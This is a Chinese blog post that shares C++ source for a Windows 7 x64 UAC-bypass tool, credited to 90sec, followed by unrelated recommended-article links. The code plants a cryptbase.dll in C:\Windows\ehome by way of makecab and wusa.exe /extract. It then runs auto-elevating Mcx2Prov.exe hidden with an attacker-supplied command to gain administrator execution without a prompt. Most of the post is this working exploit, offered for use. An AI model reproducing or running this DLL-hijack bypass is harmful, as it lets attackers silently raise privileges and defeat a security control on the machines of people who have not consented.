WIN7 X64 PASSUAC 源码
2015-09-06 23:11
183 查看
// Passuac.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <Windows.h> #include <stdio.h> #include <direct.h> BOOL IsUserInAdminGroup() //判断是否在管理员组 { BOOL fInAdminGroup = FALSE; HANDLE hToken = NULL; HANDLE hTokenToCheck = NULL; DWORD cbSize = 0; OSVERSIONINFO osver = {0}; osver.dwOSVersionInfoSize = sizeof(osver); if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) goto Cleanup; if (!GetVersionEx(&osver)) goto Cleanup; if (osver.dwMajorVersion >= 6) { TOKEN_ELEVATION_TYPE elevType; if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize)) goto Cleanup; if (TokenElevationTypeLimited == elevType) { if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize)) goto Cleanup; } } if (!hTokenToCheck) { if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck)) goto Cleanup; } BYTE adminSID[SECURITY_MAX_SID_SIZE]; cbSize = sizeof(adminSID); if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize)) goto Cleanup; if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup)) goto Cleanup; Cleanup: if (hToken) CloseHandle(hToken); if (hTokenToCheck) CloseHandle(hTokenToCheck); return fInAdminGroup; } BOOL IsRunAsAdmin() //判断是否以管理员权限运行 { BOOL fIsRunAsAdmin = FALSE; DWORD dwError = ERROR_SUCCESS; PSID pAdministratorsGroup = NULL; SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; if (!AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { dwError = GetLastError(); goto Cleanup; } if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) { dwError = GetLastError(); goto Cleanup; } Cleanup: if (pAdministratorsGroup) FreeSid(pAdministratorsGroup); return fIsRunAsAdmin; } BOOL writedll64() { char Szpath[MAX_PATH] = {0}; char uacexqute[1024] = {0}; DWORD dwWrite=0; WORD wResID; HANDLE hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("Getlasterror:%d.\r\n",GetLastError()); return 0; } HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL"); HGLOBAL hG = LoadResource(NULL, hrsc); DWORD dwSize = SizeofResource( NULL, hrsc); WriteFile(hFile,hG,dwSize,&dwWrite,NULL); CloseHandle( hFile ); getcwd(Szpath, MAX_PATH); strcat(Szpath,"\\cryptbase.tmp"); system("makecab cryptbase.dll cryptbase.tmp"); sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath); ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE); //remove("cryptbase*"); DeleteFileA("cryptbase.dll"); DeleteFileA("cryptbase.tmp"); return true; } int main(int argc,char* argv[]) { FILE* fp; char szcmd[1024] = {0}; char *Options; char buffer[2048] = {0}; STARTUPINFO si={sizeof(si)}; PROCESS_INFORMATION pi; si.dwFlags=STARTF_USESHOWWINDOW; si.wShowWindow=TRUE; if (argc < 2) { printf("[*]:%s Passuac for windows 7 x64\n",argv[0]); printf("[*]:%s Setp1: passuac\r\n",argv[0]); printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]); printf("[*]:Welcome to www.90sec.org\r\n"); printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n"); return 0; } strcpy(szcmd,argv[1]); char szNewCmd[MAX_PATH] = {0}; wsprintfA(szNewCmd, "\"%s\"", szcmd); if (!IsUserInAdminGroup()) { printf("Your not have in Local Administrator Group\r\n"); printf("Program exit;"); exit(1); }else { printf("Your have in Local Administrator Group\r\n"); printf("PassUac ing.....\r\n"); if (!IsRunAsAdmin()) { if (!strcmp(szcmd,"passuac")) { writedll64(); }else { ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE); Sleep(4000); fp = fopen("c:\\programdata\\uac.txt","rb"); if (fp == NULL) { printf("Getlasterror:%d\r\n",GetLastError()); return 0; } ZeroMemory(buffer,sizeof(buffer)); while (fgets(buffer,sizeof(buffer),fp)) { printf(buffer); } fclose(fp); } } } return 0; }
需要自己写个DLL,来进行参数解析。请看代码把。
代码写的相当烂,但是能够达到地步,还请各位莫笑话。
相关文章推荐
- 第一百五十七天 how can I 坚持。
- ActiveMQ 使用场景
- Redis--rdb快照恢复
- netty源码分析
- 项目实战No3 推荐标签
- restify Server API
- ExtJs基础
- 构建自己的PHP框架--抽象框架的内容
- Android 通过Uri获取Bitmap对象
- 大数模板
- 【DirectX 游戏开发基础】自制游戏微型引擎
- 零基础学python-11.5 真值测试与if...else...三元表达式
- 零基础学python-11.5 真值测试与if...else...三元表达式
- phalcon:跟踪sql语句
- 命令式和声明式
- 不用重新安装ZendStudio更新版本方法
- CSS3的布局学习
- 机器学习实战之朴素贝叶斯
- springmvc中格林威治时间插入数据库失败
- 设计模式-行为型之状态模式